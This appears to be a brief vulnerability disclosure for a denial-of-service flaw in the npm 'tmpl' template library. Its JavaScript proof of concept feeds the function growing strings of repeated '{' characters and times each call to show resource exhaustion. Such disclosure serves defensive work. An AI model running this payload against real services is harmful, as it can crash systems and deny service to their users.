✍️ Description

It allows cause a denial of service when formatting crafted string.

🕵️‍♂️ Proof of Concept

// PoC.js
var tmpl = require("tmpl")
for(var i = 1; i <= 50000; i++) {
       var time = Date.now();
       var attack_str = ""+"{".repeat(i*10000)+"answer";
        tmpl(attack_str, { answer: 42 })
       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.